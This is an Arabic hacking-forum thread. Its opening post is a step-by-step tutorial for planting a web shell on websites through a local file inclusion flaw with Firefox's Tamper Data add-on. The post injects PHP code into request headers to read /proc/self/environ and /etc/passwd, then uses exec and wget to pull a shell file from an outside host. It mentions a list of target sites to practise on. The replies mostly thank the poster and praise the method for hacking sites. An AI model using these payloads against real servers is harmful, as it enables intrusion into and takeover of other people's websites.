1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
  2. الملاحظات
    عزيزي زائر تم اطلاق الموقع الرسمي لبرنامج الاختراق Spy-Note
    إستبعاد الملاحظة
  3. الملاحظات
    عزيزي زائر حصرياً : التقنيات النهائية لإصتياد المواقع المٌصابة بثغرات الحقن يدوياً وألياً متابعة الموضوع
    إستبعاد الملاحظة
حالة الموضوع:
مغلق
  1. Dr.reo
    rank
    Developer

    عضو منذ:
    ‏6 مايو 2012
    عدد المشاركات:
    45
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    الإقامة:
    الجزائر
    نظام التشغيل:
    Linux
    [​IMG]

    كيفكم اخواني اتمنا الجميع بخير وصحة وعافية

    حبيت اطرح هاذا الشرح لجل الافادة واتمنا انه يفديكم

    المتطلبات
    1. FireFox
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]

    2. Tamper Data
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]

    والموقع المراد التطبيق علية

    انا جبت لكم كم موقع

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]



    طيب نكمل

    في البداية لازم نقدر نقرى proc/self/environ

    [​IMG]


    بعد مايضبط الشغل نروح نشغل اداة تمبلر داتا


    [​IMG]

    بعد ماتشتغل معنا الاداة

    نروح لم

    [​IMG]

    بعدها نروح لم الموقع حقنا ونعمل تحديث وراح تخرج لن هل النافذة

    [​IMG]

    بعدها نروح للمربع هاذا

    [​IMG]

    [​IMG]

    في هاذا المربع وضعنا

    <?php phpinfo();?>


    عشان نقرة phpinfo ونضمن الشغل

    بعد ماتضغط اوك راح تخرج لك كم نافضة اضغط على الكل

    [​IMG]

    بعدها ماتضغط وتتخطى

    يفتح الموقع ويتم قراة phpinfo

    [​IMG]


    ومنها راح نشوف ادوال والسيف مود وغيرها امر مهم قبل رفع الشل

    [​IMG]

    <?exec('wget
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    h e l l.txt -O *****.php');?>

    هاذي هي الدالة exec الي راح نسخدمها لسحب الملف طبعن تقدر تغيرها اذا كانت ممنوعه
    الى chmod
    system

    ومع شوي تطوير راح تضبط

    بعدها

    نروح نشوف

    راح يفتح الموقع مثل ماكان

    طيب لما تنتهي من الحقن مثال هل الموقع
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]

    نمسح
    index.php?page=/etc/passwd

    ونحط
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    h e l l.php

    [​IMG]

    وباذن الله راح يتم الرفع الشل

    اتمنا الشرح ماهو مكرر

    اخوكم Dr.abolalh
     
    1 person likes this.
    جاري تحميل الصفحة...
  2. Mr.L4iVe
    rank
    Developer

    عضو منذ:
    ‏15 ديسمبر 2011
    عدد المشاركات:
    48
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    h34rT D4t4b4s3
    نظام التشغيل:
    Linux
    رد: رفع الشل من خلال ثغرات LFI عبر Tamper Data


    Tamper Data


    أداة رهيبة وممكن نتسفيد منها بشكل كبير

    في إختراق المواقع وبالأخص مراكز الرفع

    بارك الله فيك أخي ولا تحرمنا من جديدك
     
  3. black.boy
    rank
    Developer

    عضو منذ:
    ‏29 مايو 2012
    عدد المشاركات:
    40
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    30
    الإقامة:
    iran
    رد: رفع الشل من خلال ثغرات LFI عبر Tamper Data


    شرح رووووعة يعطيك الف عافية




     
  4. قاتل مأجور
    rank
    V • I • P

    عضو منذ:
    ‏26 أكتوبر 2011
    عدد المشاركات:
    11
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الإقامة:
    فلسطين
    نظام التشغيل:
    Linux
    رد: رفع الشل من خلال ثغرات LFI عبر Tamper Data

    السلام عليكم
    بارك الله فيك يابطل شرح رائع
    مع العلم الشرح موجود بالمنتدى طرح احد الأخوان لكن هذا لايمنعي من شكرك
    تم تقيمك قبل الرد
    بالتوفيق لك
    اخوك
     
  5. kasm
    DeveloPer Plus

    عضو منذ:
    ‏6 نوفمبر 2011
    عدد المشاركات:
    115
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    40
    رد: رفع الشل من خلال ثغرات LFI عبر Tamper Data


    بارك الله فيك &:":

     
  6. RiskY
    rankrank
    Developer

    عضو منذ:
    ‏20 ابريل 2012
    عدد المشاركات:
    54
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    30
    الإقامة:
    iq
    رد: رفع الشل من خلال ثغرات LFI عبر Tamper Data


    تسلم ربي يخليك يا كفوووو

    لا هنت آخوي العزيز
     
  7. Assassin_Jpg
    rankrank
    Developer

    عضو منذ:
    ‏2 يونيو 2012
    عدد المشاركات:
    52
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    رد: رفع الشل من خلال ثغرات LFI عبر Tamper Data

    مشكووور يا حبيبي على الموضوع الرائغ
    موفقـــ&:":
     
  8. Dr.Toni
    rank
    Developer

    عضو منذ:
    ‏2 يونيو 2012
    عدد المشاركات:
    8
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الإقامة:
    آرض الله
    رد: رفع الشل من خلال ثغرات LFI عبر Tamper Data


    مشڪْوَرٍ يًآغآلِيً آلِلِه يًعّطيًڪْ آلِعّآفيًة
     
  9. яднїм
    rankrank
    Developer

    عضو منذ:
    ‏2 يونيو 2012
    عدد المشاركات:
    53
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    30
    الوظيفة:
    ҢαƆк
    الإقامة:
    ♥IǾ-T34M♥
    رد: رفع الشل من خلال ثغرات LFI عبر Tamper Data

    عليكم السلام و الرحمه
    بارك الله فيك
     
  10. Mr.Click
    rank
    Developer

    عضو منذ:
    ‏19 مايو 2012
    عدد المشاركات:
    23
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    5
    الوظيفة:
    مختبر ختراق !
    الإقامة:
    Dammam
    رد: رفع الشل من خلال ثغرات LFI عبر Tamper Data

    يعطيك الف عافية &:":
    تم تقييمك استمر
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...